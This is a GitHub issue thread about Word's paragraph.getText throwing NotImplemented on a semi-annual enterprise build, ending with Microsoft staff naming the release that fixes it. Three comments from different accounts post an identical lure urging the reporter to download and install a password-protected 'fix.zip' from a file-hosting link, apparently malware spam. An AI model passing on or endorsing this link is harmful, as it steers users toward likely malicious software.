### ISSUE TITLE
Word: `NotImplemented` error from `paragraph.getText` on 16.0.17328.20550

### ISSUE THREAD

**Issue by greysteil** [OfficeDev/office-js#4831]
## Your Environment

* Platform [PC desktop, Mac, iOS, Office on the web]: PC desktop
* Host [Excel, Word, PowerPoint, etc.]: Word
* Office version number: 16.0.17328.20550
* Operating System: Windows
* Browser (if using Office on the web): N/A
 
## Expected behavior

Calling `paragraph.getText({ IncludeTextMarkedAsDeleted: false })` should return the current text.

## Current behavior

On `16.0.17328.20550` I get a `NotImplemented` error. Degug arguments:

```
{
code: NotImplemented,
errorLocation: Paragraph.getText,
fullStatements: [Array],
message: NotImplemented,
statement: first.getText(...);,
surroundingStatements: [Array],
toString: [Function: toString]
}
```

I'm pretty sure this is a bug. This version of Word claims to support `WordApi 1.7` ([docs](https://learn.microsoft.com/en-us/javascript/api/requirement-sets/word/word-api-requirement-sets?view=common-js-preview)) but it doesn't implement this function.

## Steps to reproduce

1. ______
2. ______
3. ______

## Link to live example(s)

1. ______
2. ______
3. ______

# Provide additional details

1. ______
2. ______
3. ______

## Context

Several of our customers run the semi-annual enterprise updates for Word, and are therefore on `16.0.17328.20550`. Our add-in is broken for these customers because we are calling an API that doesn't exist for them.

## Useful logs

- [ ] Console errors
- [ ] Screenshots
- [ ] Test file (if only happens on a particular file)

Thank you for taking the time to report an issue. Our triage team will respond to you in less than 72 hours. Normally, response time is <10 hours Monday through Friday. We do not triage on weekends.

**Comment by toufiksalhi** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by shanshanzheng-dev** [comment]
Hi @greysteil Thanks for reporting this issue. Could you share us your text code or you can try to update your word version? because I can't repro it, this function works fine from my side: this is my test code:

```
async function run() {
  await Word.run(async (context) => {
    const paragraphs = context.document.body.paragraphs;
    // Queue a command to load the text property for all of the paragraphs.
    paragraphs.load('text');

    // Synchronize the document state by executing the queued commands,
    // and return a promise to indicate task completion.
    await context.sync();

    // Queue commands to create a proxy object for the next-to-last paragraph.
    const indexOfLastParagraph = paragraphs.items.length - 1;
    const precedingParagraph = paragraphs.items[indexOfLastParagraph].getPreviousOrNullObject();
    precedingParagraph.getText({ IncludeTextMarkedAsDeleted: false })

    precedingParagraph.load('text');
    await context.sync();
    if (precedingParagraph.isNullObject) {
      console.log('There are no paragraphs before the current one.');
    } else {
      console.log('The preceding paragraph is: ' + precedingParagraph.text);
    }
  });
}
```

this is my word desktop version:
![image](https://github.com/user-attachments/assets/7a9fe196-ece3-49ab-8bb3-57bb1ee6e271)

**Comment by greysteil** [comment]
@shanshanzheng-dev are you able to replicate this on `16.0.17328.20550`? It's that build in particular that I think is buggy - I don't have any issue on other builds. (Unfortunately it's an important build, as it's the semi-annual enterprise release one.)

**Comment by shanshanzheng-dev** [comment]
Hi @greysteil we'll take a look and report back if we have a suggestion for you~

**Comment by shanshanzheng-dev** [comment]
Hi @greysteil could you share us repro video and trace log? Thanks. We'll take a look and report back if we have a suggestion for you.

**Comment by greysteil** [comment]
I can't - it was a customer of ours who was seeing this, I don't have access to the semi-annual enterprise build. I did watch him reproduce it on a Zoom call, though, and from my error logging I know that it's the `getText` call that's causing the error,  and that it was coming after a guard that checks `Office.context.requirements.isSetSupported("WordApi", "1.7")`. `getText` should be implemented if that requirement set is supported, hence this bug report.

I also have this screenshot of the user's version, taken on the call (and which matches with the version tagged in my error logging):

![build](https://github.com/user-attachments/assets/1fbbd073-1f3a-4562-9426-21531735ff6e)

Hopefully you have easier access to the semi-annual enterprise channel than I do, and can replicate on that?

**Comment by shanshanzheng-dev** [comment]
Hi @greysteil we'll take a look and report back if we have a suggestion for you. Thanks.

**Comment by greysteil** [comment]
We're seeing this bug on `17328.20588` now, too. @shanshanzheng-dev any progress on debugging / fixing?

**Comment by qinliuMSFT** [comment]
Hi @greysteil , build `17328.20588` is the current SAC version. The fix will start working with next SAC release (build 17928.xxxxx in Jan 2025). Please let me know if you have any other questions.

**Comment by greysteil** [comment]
That's great news - thanks @qinliuMSFT. I'll let our customer know.

**Comment by qinliuMSFT** [comment]
We have provided the build number in the SAC channel that contains the fix, so closing this issue.
